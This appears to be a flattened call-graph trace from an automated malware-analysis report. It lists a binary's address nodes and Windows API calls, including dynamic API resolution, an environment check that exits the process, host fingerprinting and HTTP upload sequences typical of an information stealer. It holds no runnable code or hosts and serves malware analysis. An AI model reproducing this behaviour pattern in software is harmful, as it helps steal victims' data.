e145c0 2 API calls 14239->14240 14241 e143b5 14240->14241 14242 e145c0 2 API calls 14241->14242 14243 e143ce 14242->14243 14244 e145c0 2 API calls 14243->14244 14245 e143e7 14244->14245 14246 e145c0 2 API calls 14245->14246 14247 e14400 14246->14247 14248 e145c0 2 API calls 14247->14248 14249 e14419 14248->14249 14250 e145c0 2 API calls 14249->14250 14251 e14432 14250->14251 14252 e145c0 2 API calls 14251->14252 14253 e1444b 14252->14253 14254 e145c0 2 API calls 14253->14254 14255 e14464 14254->14255 14256 e145c0 2 API calls 14255->14256 14257 e1447d 14256->14257 14258 e145c0 2 API calls 14257->14258 14259 e14496 14258->14259 14260 e145c0 2 API calls 14259->14260 14261 e144af 14260->14261 14262 e145c0 2 API calls 14261->14262 14263 e144c8 14262->14263 14264 e145c0 2 API calls 14263->14264 14265 e144e1 14264->14265 14266 e145c0 2 API calls 
14265->14266 14267 e144fa 14266->14267 14268 e145c0 2 API calls 14267->14268 14269 e14513 14268->14269 14270 e145c0 2 API calls 14269->14270 14271 e1452c 14270->14271 14272 e145c0 2 API calls 14271->14272 14273 e14545 14272->14273 14274 e145c0 2 API calls 14273->14274 14275 e1455e 14274->14275 14276 e145c0 2 API calls 14275->14276 14277 e14577 14276->14277 14278 e145c0 2 API calls 14277->14278 14279 e14590 14278->14279 14280 e145c0 2 API calls 14279->14280 14281 e145a9 14280->14281 14282 e29c10 14281->14282 14283 e29c20 43 API calls 14282->14283 14284 e2a036 8 API calls 14282->14284 14283->14284 14285 e2a146 14284->14285 14286 e2a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14284->14286 14287 e2a153 8 API calls 14285->14287 14288 e2a216 14285->14288 14286->14285 14287->14288 14289 e2a298 14288->14289 14290 e2a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14288->14290 14291 e2a337 14289->14291 14292 e2a2a5 6 API calls 14289->14292 14290->14289 14293 e2a344 9 API calls 14291->14293 14294 e2a41f 14291->14294 14292->14291 14293->14294 14295 e2a4a2 14294->14295 14296 e2a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14294->14296 14297 e2a4ab GetProcAddress GetProcAddress 14295->14297 14298 e2a4dc 14295->14298 14296->14295 14297->14298 14299 e2a515 14298->14299 14300 e2a4e5 GetProcAddress GetProcAddress 14298->14300 14301 e2a612 14299->14301 14302 e2a522 10 API calls 14299->14302 14300->14299 14303 e2a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14301->14303 14304 e2a67d 14301->14304 14302->14301 14303->14304 14305 e2a686 GetProcAddress 14304->14305 14306 e2a69e 14304->14306 14305->14306 14307 e2a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14306->14307 14308 e25ca3 14306->14308 14307->14308 14309 e11590 14308->14309 15430 e11670 14309->15430 14312 e2a7a0 lstrcpy 14313 e115b5 14312->14313 14314 e2a7a0 lstrcpy 14313->14314 14315 e115c7 
14314->14315 14316 e2a7a0 lstrcpy 14315->14316 14317 e115d9 14316->14317 14318 e2a7a0 lstrcpy 14317->14318 14319 e11663 14318->14319 14320 e25510 14319->14320 14321 e25521 14320->14321 14322 e2a820 2 API calls 14321->14322 14323 e2552e 14322->14323 14324 e2a820 2 API calls 14323->14324 14325 e2553b 14324->14325 14326 e2a820 2 API calls 14325->14326 14327 e25548 14326->14327 14328 e2a740 lstrcpy 14327->14328 14329 e25555 14328->14329 14330 e2a740 lstrcpy 14329->14330 14331 e25562 14330->14331 14332 e2a740 lstrcpy 14331->14332 14333 e2556f 14332->14333 14334 e2a740 lstrcpy 14333->14334 14346 e2557c 14334->14346 14335 e2a8a0 lstrcpy 14335->14346 14336 e25643 StrCmpCA 14336->14346 14337 e256a0 StrCmpCA 14338 e257dc 14337->14338 14337->14346 14340 e2a8a0 lstrcpy 14338->14340 14339 e2a7a0 lstrcpy 14339->14346 14341 e257e8 14340->14341 14342 e2a820 2 API calls 14341->14342 14344 e257f6 14342->14344 14343 e251f0 20 API calls 14343->14346 14347 e2a820 2 API calls 14344->14347 14345 e25856 StrCmpCA 14345->14346 14348 e25991 14345->14348 14346->14335 14346->14336 14346->14337 14346->14339 14346->14343 14346->14345 14351 e11590 lstrcpy 14346->14351 14355 e2a740 lstrcpy 14346->14355 14356 e2a820 lstrlen lstrcpy 14346->14356 14357 e252c0 25 API calls 14346->14357 14359 e25a0b StrCmpCA 14346->14359 14371 e2578a StrCmpCA 14346->14371 14373 e2593f StrCmpCA 14346->14373 14350 e25805 14347->14350 14349 e2a8a0 lstrcpy 14348->14349 14352 e2599d 14349->14352 14353 e11670 lstrcpy 14350->14353 14351->14346 14354 e2a820 2 API calls 14352->14354 14374 e25811 14353->14374 14358 e259ab 14354->14358 14355->14346 14356->14346 14357->14346 14360 e2a820 2 API calls 14358->14360 14361 e25a16 Sleep 14359->14361 14362 e25a28 14359->14362 14363 e259ba 14360->14363 14361->14346 14364 e2a8a0 lstrcpy 14362->14364 14366 e11670 lstrcpy 14363->14366 14365 e25a34 14364->14365 14367 e2a820 2 API calls 14365->14367 14366->14374 14368 e25a43 14367->14368 14369 e2a820 2 API calls 14368->14369 14370 e25a52 
14369->14370 14372 e11670 lstrcpy 14370->14372 14371->14346 14372->14374 14373->14346 14374->13427 14376 e27553 GetVolumeInformationA 14375->14376 14377 e2754c 14375->14377 14379 e27591 14376->14379 14377->14376 14378 e275fc GetProcessHeap RtlAllocateHeap 14380 e27628 wsprintfA 14378->14380 14381 e27619 14378->14381 14379->14378 14383 e2a740 lstrcpy 14380->14383 14382 e2a740 lstrcpy 14381->14382 14384 e25da7 14382->14384 14383->14384 14384->13448 14386 e2a7a0 lstrcpy 14385->14386 14387 e14899 14386->14387 15439 e147b0 14387->15439 14389 e148a5 14390 e2a740 lstrcpy 14389->14390 14391 e148d7 14390->14391 14392 e2a740 lstrcpy 14391->14392 14393 e148e4 14392->14393 14394 e2a740 lstrcpy 14393->14394 14395 e148f1 14394->14395 14396 e2a740 lstrcpy 14395->14396 14397 e148fe 14396->14397 14398 e2a740 lstrcpy 14397->14398 14399 e1490b InternetOpenA StrCmpCA 14398->14399 14400 e14944 14399->14400 14401 e14ecb InternetCloseHandle 14400->14401 15445 e28b60 14400->15445 14402 e14ee8 14401->14402 15460 e19ac0 CryptStringToBinaryA 14402->15460 14404 e14963 15453 e2a920 14404->15453 14407 e14976 14409 e2a8a0 lstrcpy 14407->14409 14414 e1497f 14409->14414 14410 e2a820 2 API calls 14411 e14f05 14410->14411 14413 e2a9b0 4 API calls 14411->14413 14412 e14f27 codecvt 14416 e2a7a0 lstrcpy 14412->14416 14415 e14f1b 14413->14415 14418 e2a9b0 4 API calls 14414->14418 14417 e2a8a0 lstrcpy 14415->14417 14429 e14f57 14416->14429 14417->14412 14419 e149a9 14418->14419 14420 e2a8a0 lstrcpy 14419->14420 14421 e149b2 14420->14421 14422 e2a9b0 4 API calls 14421->14422 14423 e149d1 14422->14423 14424 e2a8a0 lstrcpy 14423->14424 14425 e149da 14424->14425 14426 e2a920 3 API calls 14425->14426 14427 e149f8 14426->14427 14428 e2a8a0 lstrcpy 14427->14428 14430 e14a01 14428->14430 14429->13451 14431 e2a9b0 4 API calls 14430->14431 14432 e14a20 14431->14432 14433 e2a8a0 lstrcpy 14432->14433 14434 e14a29 14433->14434 14435 e2a9b0 4 API calls 14434->14435 14436 e14a48 14435->14436 14437 e2a8a0 lstrcpy 
14436->14437 14438 e14a51 14437->14438 14439 e2a9b0 4 API calls 14438->14439 14440 e14a7d 14439->14440 14441 e2a920 3 API calls 14440->14441 14442 e14a84 14441->14442 14443 e2a8a0 lstrcpy 14442->14443 14444 e14a8d 14443->14444 14445 e14aa3 InternetConnectA 14444->14445 14445->14401 14446 e14ad3 HttpOpenRequestA 14445->14446 14448 e14b28 14446->14448 14449 e14ebe InternetCloseHandle 14446->14449 14450 e2a9b0 4 API calls 14448->14450 14449->14401 14451 e14b3c 14450->14451 14452 e2a8a0 lstrcpy 14451->14452 14453 e14b45 14452->14453 14454 e2a920 3 API calls 14453->14454 14455 e14b63 14454->14455 14456 e2a8a0 lstrcpy 14455->14456 14457 e14b6c 14456->14457 14458 e2a9b0 4 API calls 14457->14458 14459 e14b8b 14458->14459 14460 e2a8a0 lstrcpy 14459->14460 14461 e14b94 14460->14461 14462 e2a9b0 4 API calls 14461->14462 14463 e14bb5 14462->14463 14464 e2a8a0 lstrcpy 14463->14464 14465 e14bbe 14464->14465 14466 e2a9b0 4 API calls 14465->14466 14467 e14bde 14466->14467 14468 e2a8a0 lstrcpy 14467->14468 14469 e14be7 14468->14469 14470 e2a9b0 4 API calls 14469->14470 14471 e14c06 14470->14471 14472 e2a8a0 lstrcpy 14471->14472 14473 e14c0f 14472->14473 14474 e2a920 3 API calls 14473->14474 14475 e14c2d 14474->14475 14476 e2a8a0 lstrcpy 14475->14476 14477 e14c36 14476->14477 14478 e2a9b0 4 API calls 14477->14478 14479 e14c55 14478->14479 14480 e2a8a0 lstrcpy 14479->14480 14481 e14c5e 14480->14481 14482 e2a9b0 4 API calls 14481->14482 14483 e14c7d 14482->14483 14484 e2a8a0 lstrcpy 14483->14484 14485 e14c86 14484->14485 14486 e2a920 3 API calls 14485->14486 14487 e14ca4 14486->14487 14488 e2a8a0 lstrcpy 14487->14488 14489 e14cad 14488->14489 14490 e2a9b0 4 API calls 14489->14490 14491 e14ccc 14490->14491 14492 e2a8a0 lstrcpy 14491->14492 14493 e14cd5 14492->14493 14494 e2a9b0 4 API calls 14493->14494 14495 e14cf6 14494->14495 14496 e2a8a0 lstrcpy 14495->14496 14497 e14cff 14496->14497 14498 e2a9b0 4 API calls 14497->14498 14499 e14d1f 14498->14499 14500 e2a8a0 lstrcpy 14499->14500 
14501 e14d28 14500->14501 14502 e2a9b0 4 API calls 14501->14502 14503 e14d47 14502->14503 14504 e2a8a0 lstrcpy 14503->14504 14505 e14d50 14504->14505 14506 e2a920 3 API calls 14505->14506 14507 e14d6e 14506->14507 14508 e2a8a0 lstrcpy 14507->14508 14509 e14d77 14508->14509 14510 e2a740 lstrcpy 14509->14510 14511 e14d92 14510->14511 14512 e2a920 3 API calls 14511->14512 14513 e14db3 14512->14513 14514 e2a920 3 API calls 14513->14514 14515 e14dba 14514->14515 14516 e2a8a0 lstrcpy 14515->14516 14517 e14dc6 14516->14517 14518 e14de7 lstrlen 14517->14518 14519 e14dfa 14518->14519 14520 e14e03 lstrlen 14519->14520 15459 e2aad0 14520->15459 14522 e14e13 HttpSendRequestA 14523 e14e32 InternetReadFile 14522->14523 14524 e14e67 InternetCloseHandle 14523->14524 14529 e14e5e 14523->14529 14527 e2a800 14524->14527 14526 e2a9b0 4 API calls 14526->14529 14527->14449 14528 e2a8a0 lstrcpy 14528->14529 14529->14523 14529->14524 14529->14526 14529->14528 15466 e2aad0 14530->15466 14532 e217c4 StrCmpCA 14533 e217d7 14532->14533 14534 e217cf ExitProcess 14532->14534 14535 e219c2 14533->14535 14536 e218cf StrCmpCA 14533->14536 14537 e218ad StrCmpCA 14533->14537 14538 e21932 StrCmpCA 14533->14538 14539 e21913 StrCmpCA 14533->14539 14540 e21970 StrCmpCA 14533->14540 14541 e218f1 StrCmpCA 14533->14541 14542 e21951 StrCmpCA 14533->14542 14543 e2187f StrCmpCA 14533->14543 14544 e2185d StrCmpCA 14533->14544 14545 e2a820 lstrlen lstrcpy 14533->14545 14535->13453 14536->14533 14537->14533 14538->14533 14539->14533 14540->14533 14541->14533 14542->14533 14543->14533 14544->14533 14545->14533 14547 e2a7a0 lstrcpy 14546->14547 14548 e15979 14547->14548 14549 e147b0 2 API calls 14548->14549 14550 e15985 14549->14550 14551 e2a740 lstrcpy 14550->14551 14552 e159ba 14551->14552 14553 e2a740 lstrcpy 14552->14553 14554 e159c7 14553->14554 14555 e2a740 lstrcpy 14554->14555 14556 e159d4 14555->14556 14557 e2a740 lstrcpy 14556->14557 14558 e159e1 14557->14558 14559 e2a740 lstrcpy 14558->14559 14560 e159ee 
InternetOpenA StrCmpCA 14559->14560 14561 e15a1d 14560->14561 14562 e15fc3 InternetCloseHandle 14561->14562 14563 e28b60 3 API calls 14561->14563 14564 e15fe0 14562->14564 14565 e15a3c 14563->14565 14567 e19ac0 4 API calls 14564->14567 14566 e2a920 3 API calls 14565->14566 14568 e15a4f 14566->14568 14569 e15fe6 14567->14569 14570 e2a8a0 lstrcpy 14568->14570 14571 e2a820 2 API calls 14569->14571 14574 e1601f codecvt 14569->14574 14575 e15a58 14570->14575 14572 e15ffd 14571->14572 14573 e2a9b0 4 API calls 14572->14573 14576 e16013 14573->14576 14578 e2a7a0 lstrcpy 14574->14578 14579 e2a9b0 4 API calls 14575->14579 14577 e2a8a0 lstrcpy 14576->14577 14577->14574 14587 e1604f 14578->14587 14580 e15a82 14579->14580 14581 e2a8a0 lstrcpy 14580->14581 14582 e15a8b 14581->14582 14583 e2a9b0 4 API calls 14582->14583 14584 e15aaa 14583->14584 14585 e2a8a0 lstrcpy 14584->14585 14586 e15ab3 14585->14586 14588 e2a920 3 API calls 14586->14588 14587->13459 14589 e15ad1 14588->14589 14590 e2a8a0 lstrcpy 14589->14590 14591 e15ada 14590->14591 14592 e2a9b0 4 API calls 14591->14592 14593 e15af9 14592->14593 14594 e2a8a0 lstrcpy 14593->14594 14595 e15b02 14594->14595 14596 e2a9b0 4 API calls 14595->14596 14597 e15b21 14596->14597 14598 e2a8a0 lstrcpy 14597->14598 14599 e15b2a 14598->14599 14600 e2a9b0 4 API calls 14599->14600 14601 e15b56 14600->14601 14602 e2a920 3 API calls 14601->14602 14603 e15b5d 14602->14603 14604 e2a8a0 lstrcpy 14603->14604 14605 e15b66 14604->14605 14606 e15b7c InternetConnectA 14605->14606 14606->14562 14607 e15bac HttpOpenRequestA 14606->14607 14609 e15fb6 InternetCloseHandle 14607->14609 14610 e15c0b 14607->14610 14609->14562 14611 e2a9b0 4 API calls 14610->14611 14612 e15c1f 14611->14612 14613 e2a8a0 lstrcpy 14612->14613 14614 e15c28 14613->14614 14615 e2a920 3 API calls 14614->14615 14616 e15c46 14615->14616 14617 e2a8a0 lstrcpy 14616->14617 14618 e15c4f 14617->14618 14619 e2a9b0 4 API calls 14618->14619 14620 e15c6e 14619->14620 14621 e2a8a0 lstrcpy 
14620->14621 14622 e15c77 14621->14622 14623 e2a9b0 4 API calls 14622->14623 14624 e15c98 14623->14624 14625 e2a8a0 lstrcpy 14624->14625 14626 e15ca1 14625->14626 14627 e2a9b0 4 API calls 14626->14627 14628 e15cc1 14627->14628 14629 e2a8a0 lstrcpy 14628->14629 14630 e15cca 14629->14630 14631 e2a9b0 4 API calls 14630->14631 14632 e15ce9 14631->14632 14633 e2a8a0 lstrcpy 14632->14633 14634 e15cf2 14633->14634 14635 e2a920 3 API calls 14634->14635 14636 e15d10 14635->14636 14637 e2a8a0 lstrcpy 14636->14637 14638 e15d19 14637->14638 14639 e2a9b0 4 API calls 14638->14639 14640 e15d38 14639->14640 14641 e2a8a0 lstrcpy 14640->14641 14642 e15d41 14641->14642 14643 e2a9b0 4 API calls 14642->14643 14644 e15d60 14643->14644 14645 e2a8a0 lstrcpy 14644->14645 14646 e15d69 14645->14646 14647 e2a920 3 API calls 14646->14647 14648 e15d87 14647->14648 14649 e2a8a0 lstrcpy 14648->14649 14650 e15d90 14649->14650 14651 e2a9b0 4 API calls 14650->14651 14652 e15daf 14651->14652 14653 e2a8a0 lstrcpy 14652->14653 14654 e15db8 14653->14654 14655 e2a9b0 4 API calls 14654->14655 14656 e15dd9 14655->14656 14657 e2a8a0 lstrcpy 14656->14657 14658 e15de2 14657->14658 14659 e2a9b0 4 API calls 14658->14659 14660 e15e02 14659->14660 14661 e2a8a0 lstrcpy 14660->14661 14662 e15e0b 14661->14662 14663 e2a9b0 4 API calls 14662->14663 14664 e15e2a 14663->14664 14665 e2a8a0 lstrcpy 14664->14665 14666 e15e33 14665->14666 14667 e2a920 3 API calls 14666->14667 14668 e15e54 14667->14668 14669 e2a8a0 lstrcpy 14668->14669 14670 e15e5d 14669->14670 14671 e15e70 lstrlen 14670->14671 15467 e2aad0 14671->15467 14673 e15e81 lstrlen GetProcessHeap RtlAllocateHeap 15468 e2aad0 14673->15468 14675 e15eae lstrlen 14676 e15ebe 14675->14676 14677 e15ed7 lstrlen 14676->14677 14678 e15ee7 14677->14678 14679 e15ef0 lstrlen 14678->14679 14680 e15f04 14679->14680 14681 e15f1a lstrlen 14680->14681 15469 e2aad0 14681->15469 14683 e15f2a HttpSendRequestA 14684 e15f35 InternetReadFile 14683->14684 14685 e15f6a InternetCloseHandle 
14684->14685 14689 e15f61 14684->14689 14685->14609 14687 e2a9b0 4 API calls 14687->14689 14688 e2a8a0 lstrcpy 14688->14689 14689->14684 14689->14685 14689->14687 14689->14688 14692 e21077 14690->14692 14691 e21151 14691->13461 14692->14691 14693 e2a820 lstrlen lstrcpy 14692->14693 14693->14692 14695 e20db7 14694->14695 14696 e20f17 14695->14696 14697 e20e27 StrCmpCA 14695->14697 14698 e20e67 StrCmpCA 14695->14698 14699 e20ea4 StrCmpCA 14695->14699 14700 e2a820 lstrlen lstrcpy 14695->14700 14696->13469 14697->14695 14698->14695 14699->14695 14700->14695 14702 e20f67 14701->14702 14703 e21044 14702->14703 14704 e20fb2 StrCmpCA 14702->14704 14705 e2a820 lstrlen lstrcpy 14702->14705 14703->13477 14704->14702 14705->14702 14707 e2a740 lstrcpy 14706->14707 14708 e21a26 14707->14708 14709 e2a9b0 4 API calls 14708->14709 14710 e21a37 14709->14710 14711 e2a8a0 lstrcpy 14710->14711 14712 e21a40 14711->14712 14713 e2a9b0 4 API calls 14712->14713 14714 e21a5b 14713->14714 14715 e2a8a0 lstrcpy 14714->14715 14716 e21a64 14715->14716 14717 e2a9b0 4 API calls 14716->14717 14718 e21a7d 14717->14718 14719 e2a8a0 lstrcpy 14718->14719 14720 e21a86 14719->14720 14721 e2a9b0 4 API calls 14720->14721 14722 e21aa1 14721->14722 14723 e2a8a0 lstrcpy 14722->14723 14724 e21aaa 14723->14724 14725 e2a9b0 4 API calls 14724->14725 14726 e21ac3 14725->14726 14727 e2a8a0 lstrcpy 14726->14727 14728 e21acc 14727->14728 14729 e2a9b0 4 API calls 14728->14729 14730 e21ae7 14729->14730 14731 e2a8a0 lstrcpy 14730->14731 14732 e21af0 14731->14732 14733 e2a9b0 4 API calls 14732->14733 14734 e21b09 14733->14734 14735 e2a8a0 lstrcpy 14734->14735 14736 e21b12 14735->14736 14737 e2a9b0 4 API calls 14736->14737 14738 e21b2d 14737->14738 14739 e2a8a0 lstrcpy 14738->14739 14740 e21b36 14739->14740 14741 e2a9b0 4 API calls 14740->14741 14742 e21b4f 14741->14742 14743 e2a8a0 lstrcpy 14742->14743 14744 e21b58 14743->14744 14745 e2a9b0 4 API calls 14744->14745 14746 e21b76 14745->14746 14747 e2a8a0 lstrcpy 
14746->14747 14748 e21b7f 14747->14748 14749 e27500 6 API calls 14748->14749 14750 e21b96 14749->14750 14751 e2a920 3 API calls 14750->14751 14752 e21ba9 14751->14752 14753 e2a8a0 lstrcpy 14752->14753 14754 e21bb2 14753->14754 14755 e2a9b0 4 API calls 14754->14755 14756 e21bdc 14755->14756 14757 e2a8a0 lstrcpy 14756->14757 14758 e21be5 14757->14758 14759 e2a9b0 4 API calls 14758->14759 14760 e21c05 14759->14760 14761 e2a8a0 lstrcpy 14760->14761 14762 e21c0e 14761->14762 15470 e27690 GetProcessHeap RtlAllocateHeap 14762->15470 14765 e2a9b0 4 API calls 14766 e21c2e 14765->14766 14767 e2a8a0 lstrcpy 14766->14767 14768 e21c37 14767->14768 14769 e2a9b0 4 API calls 14768->14769 14770 e21c56 14769->14770 14771 e2a8a0 lstrcpy 14770->14771 14772 e21c5f 14771->14772 14773 e2a9b0 4 API calls 14772->14773 14774 e21c80 14773->14774 14775 e2a8a0 lstrcpy 14774->14775 14776 e21c89 14775->14776 15477 e277c0 GetCurrentProcess IsWow64Process 14776->15477 14779 e2a9b0 4 API calls 14780 e21ca9 14779->14780 14781 e2a8a0 lstrcpy 14780->14781 14782 e21cb2 14781->14782 14783 e2a9b0 4 API calls 14782->14783 14784 e21cd1 14783->14784 14785 e2a8a0 lstrcpy 14784->14785 14786 e21cda 14785->14786 14787 e2a9b0 4 API calls 14786->14787 14788 e21cfb 14787->14788 14789 e2a8a0 lstrcpy 14788->14789 14790 e21d04 14789->14790 14791 e27850 3 API calls 14790->14791 14792 e21d14 14791->14792 14793 e2a9b0 4 API calls 14792->14793 14794 e21d24 14793->14794 14795 e2a8a0 lstrcpy 14794->14795 14796 e21d2d 14795->14796 14797 e2a9b0 4 API calls 14796->14797 14798 e21d4c 14797->14798 14799 e2a8a0 lstrcpy 14798->14799 14800 e21d55 14799->14800 14801 e2a9b0 4 API calls 14800->14801 14802 e21d75 14801->14802 14803 e2a8a0 lstrcpy 14802->14803 14804 e21d7e 14803->14804 14805 e278e0 3 API calls 14804->14805 14806 e21d8e 14805->14806 14807 e2a9b0 4 API calls 14806->14807 14808 e21d9e 14807->14808 14809 e2a8a0 lstrcpy 14808->14809 14810 e21da7 14809->14810 14811 e2a9b0 4 API calls 14810->14811 14812 e21dc6 14811->14812 
14813 e2a8a0 lstrcpy 14812->14813 14814 e21dcf 14813->14814 14815 e2a9b0 4 API calls 14814->14815 14816 e21df0 14815->14816 14817 e2a8a0 lstrcpy 14816->14817 14818 e21df9 14817->14818 15479 e27980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14818->15479 14821 e2a9b0 4 API calls 14822 e21e19 14821->14822 14823 e2a8a0 lstrcpy 14822->14823 14824 e21e22 14823->14824 14825 e2a9b0 4 API calls 14824->14825 14826 e21e41 14825->14826 14827 e2a8a0 lstrcpy 14826->14827 14828 e21e4a 14827->14828 14829 e2a9b0 4 API calls 14828->14829 14830 e21e6b 14829->14830 14831 e2a8a0 lstrcpy 14830->14831 14832 e21e74 14831->14832 15481 e27a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14832->15481 14835 e2a9b0 4 API calls 14836 e21e94 14835->14836 14837 e2a8a0 lstrcpy 14836->14837 14838 e21e9d 14837->14838 14839 e2a9b0 4 API calls 14838->14839 14840 e21ebc 14839->14840 14841 e2a8a0 lstrcpy 14840->14841 14842 e21ec5 14841->14842 14843 e2a9b0 4 API calls 14842->14843 14844 e21ee5 14843->14844 14845 e2a8a0 lstrcpy 14844->14845 14846 e21eee 14845->14846 15484 e27b00 GetUserDefaultLocaleName 14846->15484 14849 e2a9b0 4 API calls 14850 e21f0e 14849->14850 14851 e2a8a0 lstrcpy 14850->14851 14852 e21f17 14851->14852 14853 e2a9b0 4 API calls 14852->14853 14854 e21f36 14853->14854 14855 e2a8a0 lstrcpy 14854->14855 14856 e21f3f 14855->14856 14857 e2a9b0 4 API calls 14856->14857 14858 e21f60 14857->14858 14859 e2a8a0 lstrcpy 14858->14859 14860 e21f69 14859->14860 15488 e27b90 14860->15488 14862 e21f80 14863 e2a920 3 API calls 14862->14863 14864 e21f93 14863->14864 14865 e2a8a0 lstrcpy 14864->14865 14866 e21f9c 14865->14866 14867 e2a9b0 4 API calls 14866->14867 14868 e21fc6 14867->14868 14869 e2a8a0 lstrcpy 14868->14869 14870 e21fcf 14869->14870 14871 e2a9b0 4 API calls 14870->14871 14872 e21fef 14871->14872 14873 e2a8a0 lstrcpy 14872->14873 14874 e21ff8 14873->14874 15500 e27d80 GetSystemPowerStatus 14874->15500 14877 e2a9b0 4 API calls 14878 e22018 14877->14878 14879 e2a8a0 
lstrcpy 14878->14879 14880 e22021 14879->14880 14881 e2a9b0 4 API calls 14880->14881 14882 e22040 14881->14882 14883 e2a8a0 lstrcpy 14882->14883 14884 e22049 14883->14884 14885 e2a9b0 4 API calls 14884->14885 14886 e2206a 14885->14886 14887 e2a8a0 lstrcpy 14886->14887 14888 e22073 14887->14888 14889 e2207e GetCurrentProcessId 14888->14889 15502 e29470 OpenProcess 14889->15502 14892 e2a920 3 API calls 14893 e220a4 14892->14893 14894 e2a8a0 lstrcpy 14893->14894 14895 e220ad 14894->14895 14896 e2a9b0 4 API calls 14895->14896 14897 e220d7 14896->14897 14898 e2a8a0 lstrcpy 14897->14898 14899 e220e0 14898->14899 14900 e2a9b0 4 API calls 14899->14900 14901 e22100 14900->14901 14902 e2a8a0 lstrcpy 14901->14902 14903 e22109 14902->14903 15507 e27e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14903->15507 14906 e2a9b0 4 API calls 14907 e22129 14906->14907 14908 e2a8a0 lstrcpy 14907->14908 14909 e22132 14908->14909 14910 e2a9b0 4 API calls 14909->14910 14911 e22151 14910->14911 14912 e2a8a0 lstrcpy 14911->14912 14913 e2215a 14912->14913 14914 e2a9b0 4 API calls 14913->14914 14915 e2217b 14914->14915 14916 e2a8a0 lstrcpy 14915->14916 14917 e22184 14916->14917 15511 e27f60 14917->15511 14920 e2a9b0 4 API calls 14921 e221a4 14920->14921 14922 e2a8a0 lstrcpy 14921->14922 14923 e221ad 14922->14923 14924 e2a9b0 4 API calls 14923->14924 14925 e221cc 14924->14925 14926 e2a8a0 lstrcpy 14925->14926 14927 e221d5 14926->14927 14928 e2a9b0 4 API calls 14927->14928 14929 e221f6 14928->14929 14930 e2a8a0 lstrcpy 14929->14930 14931 e221ff 14930->14931 15524 e27ed0 GetSystemInfo wsprintfA 14931->15524 14934 e2a9b0 4 API calls 14935 e2221f 14934->14935 14936 e2a8a0 lstrcpy 14935->14936 14937 e22228 14936->14937 14938 e2a9b0 4 API calls 14937->14938 14939 e22247 14938->14939 14940 e2a8a0 lstrcpy 14939->14940 14941 e22250 14940->14941 14942 e2a9b0 4 API calls 14941->14942 14943 e22270 14942->14943 14944 e2a8a0 lstrcpy 14943->14944 14945 e22279 14944->14945 15526 e28100 GetProcessHeap 
RtlAllocateHeap 14945->15526 14948 e2a9b0 4 API calls 14949 e22299 14948->14949 14950 e2a8a0 lstrcpy 14949->14950 14951 e222a2 14950->14951 14952 e2a9b0 4 API calls 14951->14952 14953 e222c1 14952->14953 14954 e2a8a0 lstrcpy 14953->14954 14955 e222ca 14954->14955 14956 e2a9b0 4 API calls 14955->14956 14957 e222eb 14956->14957 14958 e2a8a0 lstrcpy 14957->14958 14959 e222f4 14958->14959 15532 e287c0 14959->15532 14962 e2a920 3 API calls 14963 e2231e 14962->14963 14964 e2a8a0 lstrcpy 14963->14964 14965 e22327 14964->14965 14966 e2a9b0 4 API calls 14965->14966 14967 e22351 14966->14967 14968 e2a8a0 lstrcpy 14967->14968 14969 e2235a 14968->14969 14970 e2a9b0 4 API calls 14969->14970 14971 e2237a 14970->14971 14972 e2a8a0 lstrcpy 14971->14972 14973 e22383 14972->14973 14974 e2a9b0 4 API calls 14973->14974 14975 e223a2 14974->14975 14976 e2a8a0 lstrcpy 14975->14976 14977 e223ab 14976->14977 15537 e281f0 14977->15537 14979 e223c2 14980 e2a920 3 API calls 14979->14980 14981 e223d5 14980->14981 14982 e2a8a0 lstrcpy 14981->14982 14983 e223de 14982->14983 14984 e2a9b0 4 API calls 14983->14984 14985 e2240a 14984->14985 14986 e2a8a0 lstrcpy 14985->14986 14987 e22413 14986->14987 14988 e2a9b0 4 API calls 14987->14988 14989 e22432 14988->14989 14990 e2a8a0 lstrcpy 14989->14990 14991 e2243b 14990->14991 14992 e2a9b0 4 API calls 14991->14992 14993 e2245c 14992->14993 14994 e2a8a0 lstrcpy 14993->14994 14995 e22465 14994->14995 14996 e2a9b0 4 API calls 14995->14996 14997 e22484 14996->14997 14998 e2a8a0 lstrcpy 14997->14998 14999 e2248d 14998->14999 15000 e2a9b0 4 API calls 14999->15000 15001 e224ae 15000->15001 15002 e2a8a0 lstrcpy 15001->15002 15003 e224b7 15002->15003 15545 e28320 15003->15545 15005 e224d3 15006 e2a920 3 API calls 15005->15006 15007 e224e6 15006->15007 15008 e2a8a0 lstrcpy 15007->15008 15009 e224ef 15008->15009 15010 e2a9b0 4 API calls 15009->15010 15011 e22519 15010->15011 15012 e2a8a0 lstrcpy 15011->15012 15013 e22522 15012->15013 15014 e2a9b0 4 API calls 
15013->15014 15015 e22543 15014->15015 15016 e2a8a0 lstrcpy 15015->15016 15017 e2254c 15016->15017 15018 e28320 17 API calls 15017->15018 15019 e22568 15018->15019 15020 e2a920 3 API calls 15019->15020 15021 e2257b 15020->15021 15022 e2a8a0 lstrcpy 15021->15022 15023 e22584 15022->15023 15024 e2a9b0 4 API calls 15023->15024 15025 e225ae 15024->15025 15026 e2a8a0 lstrcpy 15025->15026 15027 e225b7 15026->15027 15028 e2a9b0 4 API calls 15027->15028 15029 e225d6 15028->15029 15030 e2a8a0 lstrcpy 15029->15030 15031 e225df 15030->15031 15032 e2a9b0 4 API calls 15031->15032 15033 e22600 15032->15033 15034 e2a8a0 lstrcpy 15033->15034 15035 e22609 15034->15035 15581 e28680 15035->15581 15037 e22620 15038 e2a920 3 API calls 15037->15038 15039 e22633 15038->15039 15040 e2a8a0 lstrcpy 15039->15040 15041 e2263c 15040->15041 15042 e2265a lstrlen 15041->15042 15043 e2266a 15042->15043 15044 e2a740 lstrcpy 15043->15044 15045 e2267c 15044->15045 15046 e11590 lstrcpy 15045->15046 15047 e2268d 15046->15047 15591 e25190 15047->15591 15049 e22699 15049->13481 15779 e2aad0 15050->15779 15052 e15009 InternetOpenUrlA 15053 e15021 15052->15053 15054 e150a0 InternetCloseHandle InternetCloseHandle 15053->15054 15055 e1502a InternetReadFile 15053->15055 15056 e150ec 15054->15056 15055->15053 15056->13485 15780 e198d0 15057->15780 15059 e20759 15060 e20a38 15059->15060 15061 e2077d 15059->15061 15062 e11590 